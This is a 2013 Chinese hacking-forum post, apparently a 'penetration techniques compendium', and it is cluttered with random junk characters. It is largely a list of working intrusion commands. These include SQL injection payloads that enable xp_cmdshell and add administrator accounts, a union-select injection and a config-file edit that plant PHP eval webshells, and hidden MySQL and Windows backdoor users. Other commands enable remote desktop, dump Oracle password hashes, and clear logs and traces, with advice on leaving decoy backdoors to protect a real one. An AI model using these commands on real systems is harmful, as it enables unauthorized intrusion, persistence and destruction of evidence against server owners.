找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4864|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, k7 b. E, J, {3 T5 E5 v+ H1.net user administrator /passwordreq:no
2 Q7 d# b6 B$ e* O2 d' [" q: ^这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了! j+ x+ L' H( H# N# F$ h
2.比较巧妙的建克隆号的步骤8 t9 }8 D6 x' W- W
先建一个user的用户
5 E* n3 S/ o6 f' A7 _  d然后导出注册表。然后在计算机管理里删掉- y) v' W- ]" _! Z; u
在导入,在添加为管理员组
2 b6 J+ R+ A  J" x* U3 T. F# \3.查radmin密码
* A9 {* Q, Z9 l7 ?! W3 V& T$ z: qreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
# Q% }1 |, e0 t4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]+ P* [+ Q2 t# {" O, x7 h$ o
建立一个"services.exe"的项& Q# }3 D! p- f  x0 a$ o  E
再在其下面建立(字符串值)
: W! W2 k% _! k$ j2 Z! r0 Y6 e键值为mu ma的全路径% d! ?! d4 [3 f, s1 [
5.runas /user:guest cmd
9 H  I: b( k3 R" [) Q; D测试用户权限!( Z. g8 l* b  E$ X/ N4 }2 L
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?7 D  s3 A/ H" o* |; K6 k
7.入侵后漏洞修补、痕迹清理,后门置放:
. G; z  j* G2 d1 K# k! @基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门* o& }6 a6 E, F; c' ?
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
) u1 D0 R; p6 q& S& L# s- T, ^
5 e9 W+ E1 @; Tfor example
! m, y; V  c4 ?* O
5 L: _6 _* ?4 C3 ^' c; D0 l" Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add': O& L7 i2 {" a+ ~7 J5 U, L# ]
3 \& w* v  y: H2 P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
, ^+ D* ~6 g8 Q, V8 F9 H+ {# ~0 Z) `. ?; A  c/ `/ L6 J4 r
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
5 J, d9 F5 D) S如果要启用的话就必须把他加到高级用户模式
+ y% U! D8 C4 `4 d! B( D可以直接在注入点那里直接注入8 M1 D0 K# @6 G( L1 K# J' x7 }* E
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--8 L9 n- x' s# S; [" J  ]
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
4 ?4 E( d  F* s: W$ T或者! p  y) M( n) p7 a
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
' N9 t+ D& _7 }& K) j+ M" t来恢复cmdshell。# E( r  x" A2 |0 o
1 v3 T" A- O6 N
分析器
/ \: ?7 c  h8 z9 w9 |EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--+ F+ @8 V  e3 L" q. s+ n
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
( _: h4 O) ?2 W1 y- S10.xp_cmdshell新的恢复办法6 ?" f! V7 M& \  {
xp_cmdshell新的恢复办法
8 h' w( S2 ]$ |" O) V) S# ]扩展储存过程被删除以后可以有很简单的办法恢复:) Z8 }- Y* g6 W) {! k
删除
  G! y1 o* \. @. Y* B2 w9 idrop procedure sp_addextendedproc
8 l0 a) s9 i" X7 G  }8 E0 ?drop procedure sp_oacreate
+ D! {# {! H9 jexec sp_dropextendedproc 'xp_cmdshell'
1 t% x+ C2 n2 J+ R( a
9 U0 z# Z* T3 k( ]: M1 s恢复
: ]! J) o3 k$ K/ H9 jdbcc addextendedproc ("sp_oacreate","odsole70.dll")
- A( ]$ x; B( w2 |- Y* K% A+ ]dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
1 e2 T5 w/ d( z( h3 `) B& e) Z" e3 d2 A8 _' @0 W7 _8 H& P# j
这样可以直接恢复,不用去管sp_addextendedproc是不是存在# F( N* q: G; A/ ~; N

& _$ N0 |2 c2 u" F; I-----------------------------9 P9 g7 k; z4 k& _; r

3 _8 i0 @8 \5 i9 p2 \7 B删除扩展存储过过程xp_cmdshell的语句:
( @8 C7 R$ g" H# }. w  lexec sp_dropextendedproc 'xp_cmdshell'6 q: R. ?4 F8 K, E* O! w

9 [4 _  I; x/ b# L恢复cmdshell的sql语句; D* T. L7 N9 k1 q7 R
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
# V, `9 a9 \) ?! l( C+ d( ~) D
0 U$ X2 c: Q5 t0 v% ~6 D+ v. A& E, q+ f- i
开启cmdshell的sql语句, a* Z  \+ l6 M2 V  n. p
& e7 M. }& O% W/ `  H: t3 c1 c
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
8 |/ j+ G# b) [4 r9 n5 \
* n4 w' B9 S/ W; }7 k$ z- _判断存储扩展是否存在% `. N2 Z, U* `  T6 Q6 [( L5 O
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
' [) t0 }2 Q5 j1 w" S7 D' I返回结果为1就ok
9 p4 k9 ?; F8 ~/ v! a  r
) N. t6 Z( c  ~恢复xp_cmdshell
1 H3 ^  k+ R# Z# s5 o; sexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'6 |6 {7 a) J' C; [! n/ D% v
返回结果为1就ok5 _; t" f5 n* Z6 ~9 M
; R0 T; x4 B7 h2 H
否则上传xplog7.0.dll
9 v, `% T" X  c3 J! xexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll': E- V+ J" g1 u0 U  V
8 Z  I4 q+ |! ?4 ?: V/ v* S
堵上cmdshell的sql语句
, W- [1 j- O+ a6 Usp_dropextendedproc "xp_cmdshel" t" D' T4 l5 U/ `
-------------------------
6 B# E5 }. s% [# C清除3389的登录记录用一条系统自带的命令:
. F$ L7 S2 L- H, ]3 L* f# b4 h' jreg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
+ z4 @3 h, f# a$ w1 Z- f; U, e1 y6 q4 a8 [8 t& R; Y1 a
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件; X! r  Y( T: T
在 mysql里查看当前用户的权限
2 Z& v0 l2 z7 O6 l* h1 i6 nshow grants for  
- E. R. e3 k( l% E3 E# s2 v* J: w2 U1 Q' v
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。% p7 u) M3 q- E) R1 {
+ ]+ g6 }; K4 z3 R
5 [  z. L$ K7 k3 |7 p
Create USER 'itpro'@'%' IDENTIFIED BY '123';
9 B# D( p# K  w, N7 F5 {# F! B4 E% ~  Q6 D
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
" J( S: ~9 J2 X+ `, ]* O" X# Q/ q" V  ~3 f2 v
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
- O1 |9 s; J# E+ Y8 s, N3 R' j, N/ ~2 m& U/ y% f  e& V  `: Z
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
$ Z/ S8 N7 A# \2 R: \* e* B7 V, E' K3 |- Z. D( P7 W9 _, `
搞完事记得删除脚印哟。& X6 u7 R! S1 y$ P' \- z& X
( n$ l* a% u$ S
Drop USER 'itpro'@'%';
7 P5 D& |; I" F1 g& `$ J) M1 }
5 a9 ]: n& Y" t( b! ODrop DATABASE IF EXISTS `itpro` ;
/ w/ H6 o) e) Q: s/ R1 x8 c
" D7 s9 P8 W" ~; {( ^. i当前用户获取system权限
9 j( h  W0 |& ]/ R  {6 d( U/ \sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
9 c/ `6 _6 i, [: M; ?) L% p3 asc start SuperCMD5 m" _2 Z5 p+ I3 y. _: W& m
程序代码( ~0 J, e. y( a$ V% Q% Y
<SCRIPT LANGUAGE="VBScript">; h+ J. p( X0 z& Z- |/ H- Y
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
) ?) d& ^# q. u- jos="WinNT://"&wsnetwork.ComputerName, z* T4 @8 R2 k3 K$ }$ L
Set ob=GetObject(os)
1 ~4 I0 Z6 j0 F4 ?9 j% WSet oe=GetObject(os&"/Administrators,group")3 E: I5 B/ i5 c+ V  [0 Z; d
Set od=ob.Create("user","nosec")( E+ s+ @5 E- r( Y2 Z2 z; p
od.SetPassword "123456abc!@#", _- k( t6 c, T% c$ A/ L
od.SetInfo
0 k8 i# c  c4 Y6 h2 M' [7 i. _Set of=GetObject(os&"/nosec",user)( Y% ~0 x- P& Z; @: R% \
oe.add os&"/nosec"& S: Y" H5 w% v0 e) o. s1 L& i
</Script>. c. r1 j0 u# i& Z4 e6 O: L$ N6 y" l
<script language=javascript>window.close();</script>9 A  P3 a8 I; [9 t
1 X  ^& K$ a2 l! {
: }# p5 A$ \% N* m# e, q  d

# W* Y% k) ?1 E) N) `0 K+ a, ?/ Q/ Z- a" ~) l  K8 T
突破验证码限制入后台拿shell+ O- V! G9 n6 |. n2 v
程序代码5 `3 E6 v/ S1 r% Y  c  Y2 G8 t
REGEDIT4
" K: o  C( X+ k. ^[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] ; T0 S& d, x% M# K" S+ h- L: c( g
"BlockXBM"=dword:000000005 w# P( i" Z5 t0 l

0 V+ f4 s( k# H6 M2 k8 c保存为code.reg,导入注册表,重器IE
& Y! x+ [( N& Y) H" `( v就可以了
) M6 y6 x) _7 }3 ~  Punion写马
! ~4 u) R  ]1 }程序代码
. F& c* N9 M# `1 d" Twww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*6 ^( ?) n& l6 m" D5 Q
" b. G6 U+ W1 ~' W. R
应用在dedecms注射漏洞上,无后台写马* [6 D9 s: ^* {1 h: C
dedecms后台,无文件管理器,没有outfile权限的时候
: u( J7 ?" y+ m: J  }在插件管理-病毒扫描里) c0 H8 e: q6 p6 q5 {
写一句话进include/config_hand.php里
1 j0 P3 E3 d9 _, V& }. R) v程序代码
9 t8 Z  q2 p; }- I>';?><?php @eval($_POST[cmd]);?>/ G4 n4 l# K; i$ _: x
8 N2 X' w* j+ @* [0 `/ b

' h* v, m8 r, K" R( T# b如上格式$ ^- |/ W. F: M3 R9 P) u! G1 j
, A1 ~6 `: ^6 p2 Z
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
/ ~* @) E9 n3 t; e0 r3 W程序代码% }( R1 F% O1 W0 A
select username,password from dba_users;9 O" }  K1 O  r
' D, z( N8 L$ B( E; y

6 u$ Y& i8 `: ]; A8 w  P5 s6 X% Imysql远程连接用户1 r+ J7 Y* n- I% l6 r
程序代码
- ~+ P/ K1 Z: v( `$ t1 y! C
3 ~* Q# G. K& n/ n5 s6 XCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';+ w- y1 g; i0 F% t3 g2 Q  k# Z; y2 R
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
+ U( i# X' u, x1 J: |MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 07 u3 l& W8 i. w, M
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;* L* M% J9 Y6 q5 V; [; P* i

, @% I2 u& @* R$ X; }/ l! c, l1 [9 b- x( |! H( R5 y: r( a

: F6 L7 e$ K. K5 U1 C$ x& m; j5 L
; U7 C# P: p/ C! yecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
2 \2 h0 z# M! u& \* f
, C! ]+ @% D3 m" U5 W$ L+ j$ J1.查询终端端口& |" x3 l- k& T" r6 V) q! K2 O* [6 e
7 a. s9 C! W; G( v$ e" K3 K) M
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2 Y' q, Z8 K" N3 s0 k9 u  t; Q
6 v9 S# y8 L& R; h$ ]$ |通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"1 M; a3 c+ M1 _/ y* H, ]2 ~" o! d
type tsp.reg
& Y- C% V8 d8 r1 K& v
5 I# O  r+ E4 D6 x) @& E2 o9 F2.开启XP&2003终端服务- ?# V& ~% g, s* d& n: N. K8 V
0 |5 r& P  V4 {2 u/ v3 G/ |
( b  M2 ]  `  G  N5 t  u. P, x9 m
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
! @3 N0 G( y# s1 n. G! m' D6 H7 l/ `

! f! ?" ?( D" W& `; D" R- q) F" RREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
0 ^. p& V* k6 E( B3 l3 ~" `) a
2 D9 k6 S$ |. k8 F& W% P. C3.更改终端端口为20008(0x4E28)
1 ?' D# A* y- t5 t# `6 {! e6 ^
( d0 i# x( J( jREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
+ o1 T+ \: l8 _" n
1 L- n$ Q" |! l/ Z! ?7 p/ W" n6 w, z# tREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
& r$ k1 L) u: e+ @# V
2 F9 U, P& L# _0 u' o4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
2 b8 K' ]+ t9 ~- W- k
' a5 Y" f4 J+ r( \- e8 tREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
5 F" h* i  _) e' i
1 E  b! y" ?. D% \. u: l% w' Q0 K3 A+ {! F/ B3 r
5.开启Win2000的终端,端口为3389(需重启)
+ `4 V, x# X- o
/ L' ?) N- f0 p' F7 c0 U( Fecho Windows Registry Editor Version 5.00 >2000.reg
8 h/ m' T$ w& w$ Oecho. >>2000.reg
/ G) j9 q* R+ Y% qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
6 m) a  l+ V. D2 _+ ?4 Pecho "Enabled"="0" >>2000.reg
1 M  W$ c, n- [% S" H7 L- j- iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
# L8 @% z7 O* t3 hecho "ShutdownWithoutLogon"="0" >>2000.reg 2 s, i6 D* B7 A: F( C
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
  m$ Y8 p9 |# Z' o9 h1 mecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
( L4 Q/ g8 j/ ?3 ?4 M- k, q$ Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
6 ^& |0 a% q+ Yecho "TSEnabled"=dword:00000001 >>2000.reg 6 Y9 P, Q2 D4 p, N9 g4 H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg / Z; c6 l5 T' X) z
echo "Start"=dword:00000002 >>2000.reg - I/ q8 G+ G" E1 S7 F; [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg + e, z) Y8 J3 F0 `: Z7 r6 ~. C
echo "Start"=dword:00000002 >>2000.reg
4 k! H7 o8 g1 m3 y4 G4 Xecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg # n1 E* \: @( X( c. z
echo "Hotkey"="1" >>2000.reg 0 {) d" U  @4 e% Q0 q0 P  e" l, r0 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg $ ^. W4 P" Z0 R( o; h7 F. t
echo "ortNumber"=dword:00000D3D >>2000.reg * w6 U1 P1 I! b, O0 r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
/ ~" U" H( _% Techo "ortNumber"=dword:00000D3D >>2000.reg) s+ X/ M+ G. Q
* |" N. i7 b% K& e% W; A
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)+ x/ B$ h3 A; S5 i' S  n

+ N& K( ~: A/ p( a& M4 {@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
: o; V0 U, e  H$ o, l& a6 s(set inf=InstallHinfSection DefaultInstall)
: R8 `! B. l( b9 S4 jecho signature=$chicago$ >> restart.inf& A: j* I7 I9 ]- ^2 @
echo [defaultinstall] >> restart.inf. q, ^  `7 i- R9 x, `! J# |6 L
rundll32 setupapi,%inf% 1 %temp%\restart.inf- [# k# |( M2 x7 P
3 |7 d4 l2 M* I# Z; s4 r( F* }
' P' o& d3 ?9 a$ T$ w
7.禁用TCP/IP端口筛选 (需重启)' w3 s  c3 Y9 N! Y2 a
* n$ j6 \0 X0 v. {
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
, }( Y: j2 ~  p# [4 K5 R3 G% b' {* Z' p+ g+ R- \
8.终端超出最大连接数时可用下面的命令来连接
# b/ b# \6 _4 I: {9 Y: J3 S$ z& g) l
mstsc /v:ip:3389 /console
, [1 ^8 e# }! V+ f  i; o% _& D: r( d& g" s! H
9.调整NTFS分区权限) m5 D; d$ y9 Z

/ j% H. Z* V; f; V3 v, k0 }cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
/ [0 m+ m. @. r
4 ?8 [1 O$ o5 S+ V1 r# ~$ ocacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)4 f" U: h6 R5 c$ S0 ^& l% F

% ?% E8 E5 s) \9 _8 ~- U2 [; b------------------------------------------------------' j3 U& }8 D9 j" Q7 W% B
3389.vbs : a/ Q; U1 d& S& c0 t4 V
On Error Resume Next/ N- M2 B* G% {+ Z  b( X9 J  j
const HKEY_LOCAL_MACHINE = &H800000029 F2 \1 v& r6 J$ k) [6 a
strComputer = "."  o+ b' T3 \( C2 Z3 y3 e
Set StdOut = WScript.StdOut
0 y7 s' q* h3 j! ~3 U& FSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
# N/ \. h- D) y" R2 j$ nstrComputer & "\root\default:StdRegProv")
7 |5 _/ Z; w0 `. E& |strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"; [, O* J! Q3 `: E$ e& k0 T
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath+ D8 b& T1 r* @0 X- ]0 s3 t
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
# w8 [8 W6 K( y. W. |4 c; g* moreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
, N& @, [$ t2 e6 l/ W# gstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
! P1 Q% a4 x# |0 ]* istrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"( e4 N6 G; b/ g* a
strValueName = "fDenyTSConnections"
' g0 J, ^: q5 A7 m& ~  ^" DdwValue = 0
$ H7 V; n  t3 a! ?5 Soreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue- o2 E+ d! d5 ~( f  o3 n9 o2 `
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
8 t, l, M! f6 U1 B& F2 ]6 zstrValueName = "ortNumber"' }4 w1 g7 h1 \$ Q) c: W
dwValue = 3389
: Y  B; I& i. Y; s3 _2 v5 uoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
, T7 r0 _" t3 C0 c2 K& t# WstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"9 m: a3 r( s5 c  f- d
strValueName = "ortNumber"
3 d: }( C9 M; s* GdwValue = 3389
( X! x! F; ]$ u/ d; zoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
" H  g8 Z2 n' w% X% v6 xSet R = CreateObject("WScript.Shell")
, o+ U; o2 m4 g& QR.run("Shutdown.exe -f -r -t 0") 5 ~2 l- o9 i2 I4 |' y' J( ^* G( v
; C8 R1 U/ w! |/ f- C
删除awgina.dll的注册表键值
/ k7 D/ F* N5 T# B& @0 Y# a' y程序代码
" J. d8 @% q" O  E
  |. Z7 W5 N' e1 T' }) m+ Creg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
  A) _! }0 i3 s% b# @
0 U% [; e& S6 R+ I' F# T4 Y
# q+ j& O- S& s/ S. }% l" J. z& l. M& _; \$ y

7 \3 t6 C0 U) C2 `! i* ^程序代码1 a8 P. W8 H% }& I1 @
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
# L+ X! N' E' C2 |9 T1 g
# @$ _$ A3 r" Y: I0 L% N设置为1,关闭LM Hash5 }* w$ z% z5 j5 K; w  O) O. g+ o
- r- C. f: m; Y+ C- c. ^6 T8 T
数据库安全:入侵Oracle数据库常用操作命令
' U' M+ T& `, F+ Z! U. B最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。; z8 @  ?" \0 z' ~5 D8 X' d* _
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。5 |$ n4 k2 P4 R
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
' T% v% F: C, E/ @/ R; p3、SQL>connect / as sysdba ;(as sysoper)或; o7 \& y. C% j/ ]7 w; E$ c
connect internal/oracle AS SYSDBA ;(scott/tiger)1 l9 \9 @+ _& P5 O
conn sys/change_on_install as sysdba;
% o  H+ T+ i) U* w6 \- c4、SQL>startup; 启动数据库实例# \, O2 V9 v" U& V0 G4 o
5、查看当前的所有数据库: select * from v$database;
. N9 Q- l" x' q0 e8 c2 I6 ~select name from v$database;
. U/ K3 F6 y3 _' R4 D6、desc v$databases; 查看数据库结构字段
. G+ i7 z; u# p7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
+ o4 h0 q# T! e$ ZSQL>select * from V_$PWFILE_USERS;
1 `. |! d3 H, Y+ fShow user;查看当前数据库连接用户
2 T" Y2 r% m, h3 `% A2 N* M8、进入test数据库:database test;
. J3 d) o6 `, @" K7 `6 I" c+ x9、查看所有的数据库实例:select * from v$instance;; `! s8 o8 r! _: t( k1 j' ~
如:ora9i
& a* C0 y4 h. ]1 y; W8 Z! w5 j& u2 x& R10、查看当前库的所有数据表:* B8 K) j) R( v" P8 q, e
SQL> select TABLE_NAME from all_tables;, ?" |' P0 f( {! s
select * from all_tables;
+ ?3 I3 I& c; e' x( RSQL> select table_name from all_tables where table_name like '%u%';1 U# v( M" g$ H% I" l2 P
TABLE_NAME
" k: w% g# S) b8 [& i" u8 h------------------------------% E: @: @$ J5 l, J1 J7 t5 h
_default_auditing_options_
) q  r) c" W% r, h2 ?4 n11、查看表结构:desc all_tables;. u+ D1 P+ v  l2 ^! K! C9 w
12、显示CQI.T_BBS_XUSER的所有字段结构:: X" R5 `$ }" Y1 b) m4 R  G
desc CQI.T_BBS_XUSER;7 E( H7 j5 s6 r8 F
13、获得CQI.T_BBS_XUSER表中的记录:8 x2 ^/ i5 `9 S; H3 R5 l2 W
select * from CQI.T_BBS_XUSER;4 w' R8 X  `1 O
14、增加数据库用户:(test11/test)# \/ T( }! {! {0 ~3 Q
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;$ _8 J5 t$ R6 g! M& u
15、用户授权:
+ F1 O( o6 [: B5 R4 L3 p+ Mgrant connect,resource,dba to test11;
7 U. B; u3 o5 Ggrant sysdba to test11;  J: i1 x; a2 e+ W& Y& ~& ?  b
commit;! \1 d9 w! m! _0 Y; W0 ~6 S  D
16、更改数据库用户的密码:(将sys与system的密码改为test.)6 h/ v& ]& G- ?2 l
alter user sys indentified by test;
% s& `& q$ t6 \; ?. A! c. {alter user system indentified by test;/ R$ ]  _/ x, w* B) Z

/ H; M& D3 C$ x9 u* ^: uapplicationContext-util.xml9 ?+ i  l& r! _; ^; \
applicationContext.xml* k$ Q/ A# @3 R. k. n  r
struts-config.xml9 M* O& r" o4 L: P
web.xml' v8 X$ C- p: F
server.xml
9 K/ \6 Y6 ?) o9 M( g, ?tomcat-users.xml7 Z  m3 q6 v) M& B- G8 B
hibernate.cfg.xml
" F& Y( |7 F5 L+ Y- rdatabase_pool_config.xml# H" c6 F% S- Z8 U+ T# W, x( U" z

! o* m) F. q# ~" S/ s$ d0 K
9 L) E+ t( p% M$ h3 z! t% f" D\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
6 Y' U; L5 e* C& ?; [\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
  a( T' T: V3 E. v2 I8 g4 i\WEB-INF\struts-config.xml  文件目录结构
2 |! l% V( a) v8 j7 s
) G" J  _4 T& r" ]' l- K" uspring.properties 里边包含hibernate.cfg.xml的名称
: T  |$ P9 s# `$ q9 J8 [& \
( a  I4 p) X) ~3 O0 h. f- p
0 U% b. g5 r9 P3 ZC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml' h" x+ T! A; Q
9 h2 W7 O- f  G
如果都找不到  那就看看class文件吧。。! B3 u0 p% U3 e6 \% f6 A  H
! [0 ]8 {7 C4 M, q
测试1:. ]/ ?  y8 w8 Z" o: M2 K
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1. s' [! d0 R- ^! ]) u0 Q' n( t, ]

0 N/ c0 t! G8 w( f- x, V' h5 F; M测试2:7 O5 t2 |# j1 q% B
# B' ?% [. |7 a  N0 p- J* `. }
create table dirs(paths varchar(100),paths1 varchar(100), id int)+ C; U4 L  q" M9 R, g7 l
+ S6 M. F% K( }  F
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--. L( i$ U0 ?- O
7 p' S" Q$ U* i0 S; w( I6 j% N
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
% S4 `5 l1 C! _3 T* e# u7 E( v6 ^' T
4 r0 L% c, }- c5 o4 M. k6 B9 X4 e查看虚拟机中的共享文件:
* K' h2 K3 w( `# U' V在虚拟机中的cmd中执行; I$ D( D% U0 P$ z% i
\\.host\Shared Folders
1 b1 n; N5 d$ f, B
% I8 E/ n3 @0 t# ]cmdshell下找终端的技巧
: P+ }' z* l, H* N( `4 K" C找终端:
2 r! S& Q  R* D7 j0 i" k: l第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
$ q0 w7 J1 y+ H/ w4 P8 z  I  J; \   而终端所对应的服务名为:TermService 9 K! x% z: u( M# b# z" I4 A
第二步:用netstat -ano命令,列出所有端口对应的PID值!
